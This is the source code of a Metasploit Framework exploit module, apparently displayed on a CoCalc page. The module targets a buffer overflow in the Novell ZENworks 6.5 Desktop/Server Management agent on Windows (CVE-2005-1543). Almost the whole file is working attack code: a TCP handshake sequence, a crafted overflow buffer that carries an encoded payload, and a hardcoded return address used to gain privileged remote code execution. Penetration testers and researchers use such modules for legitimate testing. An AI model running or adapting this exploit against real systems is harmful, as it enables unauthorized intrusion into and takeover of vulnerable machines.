Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/novell/zenworks_desktop_agent.rb
33086 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Novell ZENworks 6.5 Desktop/Server Management Overflow',

16
        'Description' => %q{

17
          This module exploits a heap overflow in the Novell ZENworks

18
          Desktop Management agent. This vulnerability was discovered

19
          by Alex Wheeler.

20
        },

21
        'Author' => [ 'Unknown' ],

22
        'License' => BSD_LICENSE,

23
        'References' => [

24
          [ 'CVE', '2005-1543'],

25
          [ 'OSVDB', '16698'],

26
          [ 'BID', '13678'],

27


28
        ],

29
        'Privileged' => true,

30
        'Payload' => {

31
          'Space' => 32767,

32
          'BadChars' => "\x00",

33
          'StackAdjustment' => -3500

34
        },

35
        'Targets' => [

36
          [

37
            'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent',

38
            {

39
              'Platform' => 'win',

40
              'Ret' => 0x10002e06

41
            },

42
          ],

43
        ],

44
        'DisclosureDate' => '2005-05-19',

45
        'DefaultTarget' => 0,

46
        'Notes' => {

47
          'Reliability' => UNKNOWN_RELIABILITY,

48
          'Stability' => UNKNOWN_STABILITY,

49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

50
        }

51
      )

52
    )

53
  end

54


55
  def exploit

56
    connect

57


58
    hello = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77"

59
    print_status('Sending version identification')

60
    sock.put(hello)

61


62
    pad = Rex::Text.rand_text_alphanumeric(6, payload_badchars)

63
    ident = sock.get_once

64
    if !(ident and ident.length == 16)

65
      print_error('Failed to receive agent version identification')

66
      return

67
    end

68


69
    print_status('Received agent version identification')

70
    print_status('Sending client acknowledgement')

71
    sock.put("\x00\x01")

72


73
    # Stack buffer overflow in ZenRem32.exe / ZENworks Server Management

74
    sock.put("\x00\x06#{pad}\x00\x06#{pad}\x7f\xff" + payload.encoded + "\x00\x01")

75


76
    sock.get_once

77
    sock.put("\x00\x01")

78
    sock.put("\x00\x02")

79


80
    print_status('Sending final payload')

81
    sock.put("\x00\x24" + ('A' * 0x20) + [ target.ret ].pack('V'))

82


83
    print_status('Overflow request sent, sleeping for four seconds')

84
    select(nil, nil, nil, 4)

85


86
    handler

87
    disconnect

88
  end

89
end

90


91